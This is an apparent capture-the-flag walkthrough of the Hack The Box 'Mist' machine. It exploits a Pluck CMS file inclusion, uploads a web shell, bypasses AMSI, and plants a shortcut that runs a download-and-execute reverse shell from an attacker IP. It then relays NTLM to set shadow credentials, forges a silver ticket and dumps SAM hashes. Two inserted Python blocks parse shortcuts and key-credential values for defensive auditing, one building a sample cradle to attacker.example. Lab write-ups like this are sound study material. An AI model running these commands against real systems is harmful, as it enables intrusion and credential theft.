# HTB - Mist

<figure><img src="/files/3yZH9ITUa2a5tx6CElCi" alt=""><figcaption></figcaption></figure>

## Description

Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account’s NTLM hash, enabling a `DCSync` attack to obtain the Domain Administrator hash.

## Enumeration

**Nmap Scan**

```bash
nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan

PORT   STATE SERVICE
80/tcp open  http

nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
```

**HTTP**

<http://10.10.11.17?file=mist>

<figure><img src="/files/4fmVObhfFOKcdOinrhae" alt=""><figcaption></figcaption></figure>

When I clicked the `admin` link, I was redirected to this login page

<figure><img src="/files/PbKV78btiuuw59OuHtDM" alt=""><figcaption></figcaption></figure>

The version of `pluck` is `4.7.18`. A quick search for that version on `exploit-db` leads to this CVE, but it requires the admin password, which I don't have yet.

<figure><img src="/files/Drr6aSAGd9xYg5dd8mY9" alt=""><figcaption></figcaption></figure>

After searching further for other `pluck` CVEs, I found an unauthenticated `LFI`

<figure><img src="/files/e3xvbi1khL6CvBpPLIRW" alt=""><figcaption></figcaption></figure>

Vulnerability Details

<figure><img src="/files/6VMDrxfVshs4j12JJK9O" alt=""><figcaption></figcaption></figure>

Following this [post](https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2024-9405), I looked under the `/data/settings/modules/albums` folder and found `admin_backup.php`

<figure><img src="/files/XfWy1uv4HKrJGRn4g3QQ" alt=""><figcaption></figcaption></figure>

When I included `admin_backup.php`, I got a hash, so I will try to crack it.

<figure><img src="/files/rYUHhX3M8Frkn794zMb7" alt=""><figcaption></figcaption></figure>

On <https://crackstation.net/>, I was able to crack it

<figure><img src="/files/5mHSqou6o57zSTNGpi7g" alt=""><figcaption></figcaption></figure>

## Initial Access

When I used the cracked password to log in as admin, I was redirected to the admin portal

<figure><img src="/files/PkXDWx5yPWlXVP1th78W" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ezXulNhsjx23Vm2zfeJp" alt=""><figcaption></figcaption></figure>

> Now with the admin password, I can get `RCE` via the CVE we found before

I read the exploit and decided to perform it manually rather than using the PoC.

First, go to `http://10.10.11.17/admin.php?action=installmodule`

<figure><img src="/files/uAUTd2iVK2BaAog5Xl3f" alt=""><figcaption></figcaption></figure>

Second, create a zip file containing a `php` web shell. I will use [P0wny Shell](https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php) and upload it

```bash
zip module.zip p0wny.php
```

<figure><img src="/files/SulJaNviifAgiCarxLnQ" alt=""><figcaption></figcaption></figure>

Finally, access the webshell at `http://10.10.11.17/data/modules/module/p0wny.php`

<figure><img src="/files/QjXOFTJwosdcyVW4UyBg" alt=""><figcaption></figcaption></figure>

I will upgrade my shell with [PowerJoker](https://github.com/Adkali/PowerJoker) to get more flexibility, because the installed modules don't persist; there is probably a script in the background removing them.

<figure><img src="/files/563rz4U1UWQmwMPCs4xv" alt=""><figcaption></figcaption></figure>

## Lateral Movement

Looking at the listening ports, I see RPC, SMB, and WinRM, none of which were visible from outside. That confirms there are firewall rules preventing most inbound connections to `MS01`

```powershell
JokerShell C:\xampp\htdocs\data> netstat -ano | findstr TCP
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2412
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       852
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2412
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  ..snip..
```

Looking at the IP configuration, I found that `MS01` has a different, internal IP, `192.168.100.101`, with the hostname `ms01.mist.htb`

```powershell
JokerShell C:\> ipconfig

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.100.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.100

JokerShell C:\> nslookup ms01

DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.100.100

Name:    ms01.mist.htb
Address:  192.168.100.101
```

I also wanted to check the AV status, so I ran `Get-MpComputerStatus` and found that Defender is already running on the box

```powershell
JokerShell C:\Users\svc_web> Get-MpComputerStatus


AMEngineVersion                  : 1.1.24020.9
AMProductVersion                 : 4.18.24020.7
AMRunningMode                    : Normal
AMServiceEnabled                 : True
AMServiceVersion                 : 4.18.24020.7
AntispywareEnabled               : True
AntispywareSignatureAge          : 378
AntispywareSignatureLastUpdated  : 3/26/2024 4:22:59 AM
AntispywareSignatureVersion      : 1.407.725.0
AntivirusEnabled                 : True
AntivirusSignatureAge            : 378
AntivirusSignatureLastUpdated    : 3/26/2024 4:22:59 AM
AntivirusSignatureVersion        : 1.407.725.0
BehaviorMonitorEnabled           : True
```

I want to find a possible escalation path on `ms01`, so I uploaded `winpeas.ps1` and `PowerUp.ps1` to the box, but since AV is enabled, I had to bypass `AMSI` first.

I created a `bypass.ps1` containing a common AMSI bypass (patching `AmsiScanBuffer`), then loaded the `PowerUp.ps1` script

```powershell
iex(iwr -UseBasicParsing 10.10.16.4/bypass.ps1)
iex(iwr -UseBasicParsing 10.10.16.4/PowerUp.ps1); Invoke-AllChecks
```

Unfortunately, I didn't find any exploitation path with `PowerUp`, but under `C:\` there is an uncommon folder

```powershell
JokerShell C:\> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2024   1:50 AM                Common Applications
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         2/20/2024   5:44 AM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---         2/21/2024  12:37 PM                Users
d-----         3/26/2024  12:02 PM                Windows
d-----         3/10/2024   3:21 AM                xampp

JokerShell C:\Common Applications> dir

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/8/2021   1:15 AM           1118 Calculator.lnk
-a----          5/7/2021   3:14 PM           1175 Notepad.lnk
-a----          5/7/2021   3:15 PM           1171 Wordpad.lnk     
```

They are `.lnk` shortcuts that launch common programs on the system.

```powershell
JokerShell C:\Common Applications> type Calculator.lnk
L?F?)@%SystemRoot%\system32\shell32.dll,-22531%windir%\system32\win32calc.exef  ?-1SPS??XF?L8C???&?m?-1SPSU(L?y?9K????-????%windir%\system32\win32calc.exe%windir%\system32\win32calc.exe
```

What if I could overwrite one of them so that it executes a reverse shell when someone opens it? First, I need to check my permissions on this folder

```powershell
JokerShell C:\> icacls 'Common Applications'
Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                    MS01\Administrator:(OI)(CI)(F)
                    BUILTIN\Administrators:(OI)(CI)(F)
                    BUILTIN\Users:(OI)(CI)(RX,W)
```

From the output above, `BUILTIN\Users` has write access on the folder (`(RX,W)`).
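An `(RX,W)` grant for `BUILTIN\Users` on a folder of shared shortcuts is exactly what a defender should audit, and the quickest way to triage such a folder is to decode what every `.lnk` in it actually launches rather than trusting its icon. The following is an added example, not code from the writeup: a standard-library MS-SHLLINK parser that extracts the target path and arguments and flags PowerShell download cradles, run here on two constructed shortcuts (the `attacker.example` URL is a placeholder).

```python
"""Triage .lnk shortcuts in a user-writable folder by decoding what each one actually launches."""
import re
import struct
from pathlib import Path

HEADER_SIZE = 0x4C  # ShellLinkHeader size; LinkFlags bits below are from MS-SHLLINK 2.1.1
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 1 << 0, 1 << 1, 1 << 2
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 1 << 3, 1 << 4, 1 << 5
HAS_ICON_LOCATION, IS_UNICODE = 1 << 6, 1 << 7
# Nothing a Calculator or Notepad shortcut should ever contain.
SUSPICIOUS = re.compile(r"powershell|\biex\b|\biwr\b|invoke-(expression|webrequest)|downloadstring|\s-enc\b", re.I)


def _string(data, pos, unicode):
    """Read one StringData item: u16 character count followed by the characters."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if unicode:
        return data[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return data[pos:pos + count].decode("latin-1"), pos + count


def parse_lnk(data):
    """Return the launch-relevant fields of a ShellLink file as a dict."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = dict.fromkeys(("local_base_path", "name", "relative_path", "working_dir", "arguments", "icon_location"), "")
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the shell item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfo carries the absolute LocalBasePath
        size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 1:  # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            start = pos + base_off
            info["local_base_path"] = data[start:data.index(b"\x00", start)].decode("latin-1")
        pos += size
    unicode = bool(flags & IS_UNICODE)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            info[key], pos = _string(data, pos, unicode)
    return info


def launch_line(info):
    """The command the shortcut runs: absolute target if known, else the relative path."""
    return f'{info["local_base_path"] or info["relative_path"]} {info["arguments"]}'.strip()


def is_suspicious(info):
    return bool(SUSPICIOUS.search(launch_line(info)))


def triage_folder(folder):
    """(name, launch line, suspicious) for every .lnk in a folder that BUILTIN\\Users can write to."""
    report = []
    for path in sorted(Path(folder).glob("*.lnk")):
        info = parse_lnk(path.read_bytes())
        report.append((path.name, launch_line(info), is_suspicious(info)))
    return report


def build_lnk(local_base_path, arguments, icon_location=""):
    """Build a minimal valid ShellLink (constructed sample data, not a shortcut from the box)."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE | (HAS_ICON_LOCATION if icon_location else 0)
    clsid = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID, little-endian
    header = struct.pack("<I", HEADER_SIZE) + clsid + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    path_b = local_base_path.encode("latin-1") + b"\x00"
    vol_off = 0x1C  # LinkInfoHeaderSize: VolumeID starts right after the LinkInfo header
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(path_b)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + path_b + b"\x00"  # empty CommonPathSuffix
    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + link_info + s(arguments) + (s(icon_location) if icon_location else b"")


# Constructed samples: a genuine Calculator shortcut and one rewritten into a PowerShell cradle.
BENIGN = build_lnk(r"C:\Windows\System32\win32calc.exe", "")
TROJANED = build_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-c iex(iwr -UseBasicParsing http://attacker.example/stage.ps1)",
                     icon_location=r"C:\Windows\System32\calc.exe")
```

`triage_folder(r"C:\Common Applications")` reports each shortcut's real launch line, so a Calculator icon that resolves to `powershell.exe -c iex(...)` stands out immediately.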

On my Windows host, I created a new shortcut

<figure><img src="/files/erxUTEyP72loZMCZR47D" alt=""><figcaption></figcaption></figure>

In the target field, I put this payload; `rev.ps1` contains an encoded reverse shell

```powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr -UseBasicParsing 10.10.16.4/rev.ps1)
```

Also, I changed the icon to the `Calculator` icon from `C:\Windows\System32\calc.exe` to make the shortcut look as genuine as possible

<figure><img src="/files/z5jIw2pX3wsfT4iFBgU9" alt=""><figcaption></figcaption></figure>

Now, I will upload it to the box

```powershell
iwr 10.10.16.4/Calculator.lnk -outfile .\Calculator.lnk
```

After a short time (1-2 mins), I got a shell as `brandon.keywarp`

<figure><img src="/files/TNiSebCSLuEu8W9L5C2h" alt=""><figcaption></figcaption></figure>

The user is indeed a domain user, and it has a profile folder alongside the other users

```powershell
JokerShell C:\> whoami /all

USER INFORMATION
----------------

User Name            SID                                           
==================== ==============================================
mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110

JokerShell C:\Users> dir

    Directory: C:\Users

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----          4/8/2025   1:00 PM                Administrator
d-----         2/20/2024   6:02 AM                Administrator.MIST
d-----          4/8/2025   1:00 PM                Brandon.Keywarp
d-r---         2/20/2024   5:44 AM                Public
d-----         2/20/2024   9:39 AM                Sharon.Mullard
d-----          4/8/2025  12:59 PM                svc_web
```

I can guess that `Sharon.Mullard` is a domain user, too.

At this point, having a domain user, I need to pivot into the internal network with [ligolo-ng](https://github.com/nicocha30/ligolo-ng) to enumerate the domain controller

```bash
./proxy -selfcert  # on the Linux attack host
```

On the Windows box (`MS01`), run:

```powershell
JokerShell C:\xampp\htdocs> iwr 10.10.16.4/agent.exe -outfile .\agent.exe
JokerShell C:\xampp\htdocs> Start-Process agent.exe -ArgumentList "-connect 10.10.16.4:11601 -ignore-cert"
```

> Make sure you're in `C:\xampp\htdocs`, because it's excluded from Defender

After pivoting, I can run `Nmap` and see the results:

```bash
nmap -iL ip.txt -F -Pn 

Nmap scan report for 192.168.100.100

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds

Nmap scan report for 192.168.100.101

PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
```

Looking for remote management ports, I found WinRM running on both hosts

```bash
nmap -iL ip.txt -p5985,3389,5986 --open 

Nmap scan report for 192.168.100.100

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap scan report for 192.168.100.101

PORT     STATE SERVICE
5985/tcp open  wsman
```

Script scan for the DC

```bash
nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan

Nmap scan report for 192.168.100.100

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name)
| Subject Alternative Name: DNS:DC01.mist.htb
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```

I will add the two machines to my `/etc/hosts` file

```bash
echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts
echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hosts
```

My next move is to enumerate both the shared folders and the domain `ACLs` with BloodHound, so I will upload `SharpHound.exe` to the host and begin the collection.

I still couldn't access the shared folders without credentials

```bash
nxc smb ip.txt -u 'guest' -p '' --shares

SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.101 445    MS01             [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED 
SMB         192.168.100.100 445    DC01             [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED 

nxc smb ip.txt -u '' -p '' --shares 

SMB         192.168.100.100 445    DC01             [+] mist.htb\: 
SMB         192.168.100.100 445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
SMB         192.168.100.101 445    MS01             [-] mist.htb\: STATUS_ACCESS_DENIED
```

## Privilege Escalation (MS01)

I haven't found anything useful so far, so there is an attack I have to try: NTLM relay to LDAP using WebDAV. This post is useful for performing it: [Post](https://www.hackingarticles.in/lateral-movement-webclient-workstation-takeover/)

I already know what to do, so I will proceed directly with these steps:

1. Check whether `WebDAV` (the WebClient service) is running
2. If `WebDAV` is not running, try to enable it
3. Use any coercion method (`printerbug`, `PetitPotam`, `coercer`, etc.) to force the machine to authenticate to my host
4. Set up a relay on my host that relays the authentication coming over HTTP (`WebDAV`) to `LDAP` and performs an `RBCD` or `Shadow Credentials` attack

Performing `RBCD` depends on having an account with an `SPN` or the ability to create a machine account, whereas `Shadow Credentials` depends on `PKINIT` authentication (usually available when `ADCS` is installed).

When I enumerated the domain to see whether I can add a computer account, I found that `ms-ds-machineaccountquota` is zero, so I can't.

```powershell
JokerShell C:\xampp\htdocs> Get-DomainObject -Identity "DC=mist,DC=htb" -Properties ms-DS-MachineAccountQuota

ms-ds-machineaccountquota
-------------------------
                        0
```

When I checked the `MS01` computer object, I found that `msds-keycredentiallink` already contains a value, so a `Shadow Credentials` attack is possible.

```powershell
JokerShell C:\xampp\htdocs> Get-DomainObject -Identity MS01 -Properties msds-keycredentiallink

msds-keycredentiallink
----------------------                                                                                                 
B:828:0002000020000119F0F375256AB2B1C4FC2BDFEFAD0D21AA3D5C36890AED2D7F6FE4F3DAB2C9A62000020F090A50EB5AEE1B926A4341..snip..
```
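The value above is an LDAP DN-with-binary string (`B:<hex length>:<hex>:<DN>`) wrapping a KEYCREDENTIALLINK_BLOB: `00020000` is version 0x200, followed by entries of u16 length, u8 identifier and value (the `2000 01` that comes next is a 32-byte KeyID). Decoding it tells a defender which device registered each key and when, which is how an entry that the host itself never created stands out. This is an added example with the standard library only, not code from the writeup; it runs on a constructed sample whose key bytes and device GUID are dummies, not values from `MS01`.

```python
"""Decode an msDS-KeyCredentialLink value (MS-ADTS 2.2.20 KEYCREDENTIALLINK_BLOB) for auditing."""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

ENTRY_NAMES = {1: "KeyID", 2: "KeyHash", 3: "KeyMaterial", 4: "KeyUsage", 5: "KeySource",
               6: "DeviceId", 7: "CustomKeyInformation",
               8: "KeyApproximateLastLogonTimeStamp", 9: "KeyCreationTime"}
KEY_USAGE = {1: "NGC", 2: "STK", 3: "BitLockerRecovery", 7: "FIDO", 8: "FEK"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _from_filetime(raw):
    """FILETIME: u64 count of 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=struct.unpack("<Q", raw)[0] // 10)


def _to_filetime(when):
    delta = when - FILETIME_EPOCH  # integer arithmetic: the tick count exceeds float precision
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return struct.pack("<Q", ticks)


def _entries(blob):
    """Yield (identifier, value, end offset) per entry: u16 length, u8 identifier, value."""
    pos = 4  # skip the u32 version
    while pos + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        pos += 3
        yield ident, blob[pos:pos + length], pos + length
        pos += length


def decode_key_credential_link(value):
    """Parse the DN-with-binary string 'B:<hex length>:<hex>:<DN>' that LDAP tools return."""
    tag, hexlen, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(hexlen) != len(hexdata):
        raise ValueError("malformed DN-with-binary value")
    blob = bytes.fromhex(hexdata)
    if struct.unpack_from("<I", blob, 0)[0] != 0x200:
        raise ValueError("unsupported KEYCREDENTIALLINK_BLOB version")
    out, after_hash = {"dn": dn}, b""
    for ident, val, end in _entries(blob):
        name = ENTRY_NAMES.get(ident, f"Unknown{ident:#x}")
        if name == "KeyMaterial":
            out[name] = val  # DER public key; whoever holds the private key can PKINIT as this account
        elif name == "KeyUsage":
            out[name] = KEY_USAGE.get(val[0], f"{val[0]:#x}")
        elif name == "KeySource":
            out[name] = "AD" if val[0] == 0 else f"{val[0]:#x}"
        elif name == "DeviceId":
            out[name] = str(uuid.UUID(bytes_le=val))
        elif name in ("KeyApproximateLastLogonTimeStamp", "KeyCreationTime"):
            out[name] = _from_filetime(val)
        else:
            out[name] = val.hex()
        if name == "KeyHash":
            after_hash = blob[end:]  # KeyHash covers every entry that follows it
    # Integrity checks: KeyID = SHA-256(KeyMaterial), KeyHash = SHA-256(entries after KeyHash)
    out["key_id_ok"] = out.get("KeyID") == hashlib.sha256(out.get("KeyMaterial", b"")).hexdigest()
    out["key_hash_ok"] = out.get("KeyHash") == hashlib.sha256(after_hash).hexdigest()
    return out


def build_key_credential_link(dn, key_material, device_id, created):
    """Assemble a value in the same layout (constructed sample data, not a blob from the box)."""
    def entry(ident, val):
        return struct.pack("<HB", len(val), ident) + val
    ft = _to_filetime(created)
    tail = (entry(3, key_material) + entry(4, b"\x01") + entry(5, b"\x00")
            + entry(6, device_id.bytes_le) + entry(8, ft) + entry(9, ft))
    blob = (struct.pack("<I", 0x200) + entry(1, hashlib.sha256(key_material).digest())
            + entry(2, hashlib.sha256(tail).digest()) + tail)
    return f"B:{len(blob) * 2}:{blob.hex().upper()}:{dn}"


# Constructed sample: dummy public-key bytes and device GUID, not values taken from MS01.
SAMPLE_VALUE = build_key_credential_link(
    "CN=MS01,CN=Computers,DC=mist,DC=htb", b"constructed-der-public-key",
    uuid.UUID("11111111-2222-3333-4444-555555555555"),
    datetime(2024, 3, 10, 1, 50, tzinfo=timezone.utc))


def summarize(value):
    """One line per key that an analyst can compare against the host's own NGC registration."""
    info = decode_key_credential_link(value)
    flags = "" if info["key_id_ok"] and info["key_hash_ok"] else " [INTEGRITY MISMATCH]"
    return (f'{info["dn"]}: {info.get("KeyUsage")} key from device {info.get("DeviceId")} '
            f'created {info["KeyCreationTime"]:%Y-%m-%d %H:%M}{flags}')
```

A device ID that matches no known join record, or a creation time that coincides with a coercion or relay event in the logs, is the indicator to pivot on.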

Now, let's deal with `WebDAV`. I downloaded `SharpWebClientScanner.exe` to query its status, but it wasn't running on any host, so I have to enable it manually.

```powershell
JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb

..snip..

[x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service running
```

I will use this [Tool](https://gist.githubusercontent.com/klezVirus/af004842a73779e1d03d47e041115797/raw/29747c92ca04c844223d1ef6c1463d7e34e271ee/EtwStartWebClient.cs) to enable it from Windows

```bash
sudo apt install mono-complete
mcs EtwStartWebClient.cs -out:EtwStartWebClient.exe /unsafe
```

Then, on `MS01`, fetch the compiled binary:

```powershell
iwr 10.10.16.4:8000/EtwStartWebClient.exe -outfile .\EtwStartWebClient.exe
```

Verify with `SharpWebClientScanner`

<figure><img src="/files/1OCblvTEFQ2RhOP7Dlzz" alt=""><figcaption></figcaption></figure>

Then, execute the tool on Windows

```powershell
JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe
[+] WebClient Service started successfully
```

Now I need to use a coercion method, but that requires credentials. I only have a shell as the domain user `brandon.keywarp`, with no password or hash.

One way to get the user's hash is to use an `ADCS` template to request a certificate for the user and then recover their NT hash from it.

First, upload [Certify](https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.5_Any/Certify.exe) to the machine and request a certificate for the current user

```powershell
.\Certify.exe request /template:User /ca:DC01\mist-DC01-CA
```

<figure><img src="/files/AAJZYyIJkttIpi0hVrXJ" alt=""><figcaption></figcaption></figure>

Copy the `cert.pem` (private key and certificate), then convert it to a PFX with this command

```bash
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

With `Certipy`, I can authenticate to the domain and get the hash

```bash
certipy-ad auth -pfx cert.pfx -domain mist.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: brandon.keywarp@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brandon.keywarp.ccache'
[*] Trying to retrieve NT hash for 'brandon.keywarp'
[*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxx
```

For the WebDAV coercion to work, the target needs a hostname to connect to, but my host isn't reachable from the internal network, so I will add a port-forwarding rule (a ligolo listener) so that any connection arriving at `ms01:8888` is forwarded to port `80` on my host

```
[Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp
INFO[8701] Listener 0 created on remote agent! 
```

Since we found earlier that `MS01$` already has a `msDS-KeyCredentialLink` value, we need a tool that can clear it and add a new one. This is included in the version of `ntlmrelayx.py` from this [pull request](https://github.com/fortra/impacket/pull/1402), which adds that feature.

```bash
git clone https://github.com/fortra/impacket/ && cd impacket; git fetch origin pull/1402/head:mist && git checkout mist; 

python -m venv . && source ./bin/activate; pip install . && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0 && pip install setuptools
```

Execute the attack

```bash
python3 PetitPotam.py -u 'brandon.keywarp' -hashes :db03d6a77a2205bc1d07082740626cc9 MS01@8888/files 192.168.100.101

sudo ntlmrelayx.py -debug -t ldaps://192.168.100.100 -i -smb2support -domain mist.htb
```

<figure><img src="/files/tmCbGzdLXyDoHNIZA7Xl" alt=""><figcaption></figcaption></figure>

```bash
nc localhost 11000

$ clear_shadow_creds ms01$
$ set_shadow_creds ms01$
```

<figure><img src="/files/zB1TvOGbReAsKgtiWjRy" alt=""><figcaption></figcaption></figure>

Get a suitable cert to be used with `certipy`

```bash
certipy-ad cert -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx -password 'y5hd2VIzZgXcGREYy0uJ' -export -out cert.pfx

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'cert.pfx'
```

Authenticate to the DC using the certificate and get NT hash of the computer account.

```bash
certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzz
```

With the computer account hash, I can create a Silver ticket to access the file system as an administrator

```bash
impacket-ticketer -nthash 17749fa7409ac85c4zzzzzzzzzzzz -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn cifs/ms01.mist.htb Administrator

export KRB5CCNAME=$(pwd)/Administrator.ccache
```

Access the machine as an administrator

```bash
impacket-wmiexec -k -no-pass MS01.MIST.HTB  

[*] SMBv3.0 dialect used

C:\>whoami
mist.htb\administrator
```

I will dump SAM to save my progress

```bash
impacket-secretsdump -no-pass -k ms01.mist.htb

[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c40xxxxxxxx:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39bxxxxxxxxx:::
```

Connect to the box with a local admin account:

```bash
evil-winrm -i ms01 -u Administrator -H 711e6a685af1c31c402xxxxxxxxxxxx

*Evil-WinRM* PS C:\Users> type Administrator\Desktop\user.txt
```

> User Flag: 0c63be3b856709838ec62a926dbad528

## Privilege Escalation (DC01)

Inside the `Sharon.Mullard` profile folder, there are several files

```powershell
*Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /F

C:.
+---Desktop
+---Documents
¦       sharon.kdbx
¦
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
¦       cats.png
¦       image_20022024.png
```

The `.kdbx` file is a `KeePass` password database, so it will be protected by a master password.

`cats.png` contains nothing but pictures of cats

<figure><img src="/files/SsxymG0CMpof3y2wpj74" alt=""><figcaption></figcaption></figure>

`image_20022024.png` has something interesting:

<figure><img src="/files/889LS61DwSOGNlQTR55z" alt=""><figcaption></figcaption></figure>

A string that is partially hidden and was encoded using `base64`

```
UA7cpa[#1!_*ZX
```

I will try it against the `KeePass` hash, but I think I will need a brute-force attack with `hashcat`. First, extract the hash of the `KeePass` database

```bash
keepass2john sharon.kdbx > keepass.hash
```

The input in the image was 15 characters and the string I have is 14, so I only need to append one `?a`, which in `hashcat` means any printable character

```bash
hashcat -m 13400 -a 3 keepass.hash 'UA7cpa[#1!_*ZX?a'

..snip..

$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_xxxxx

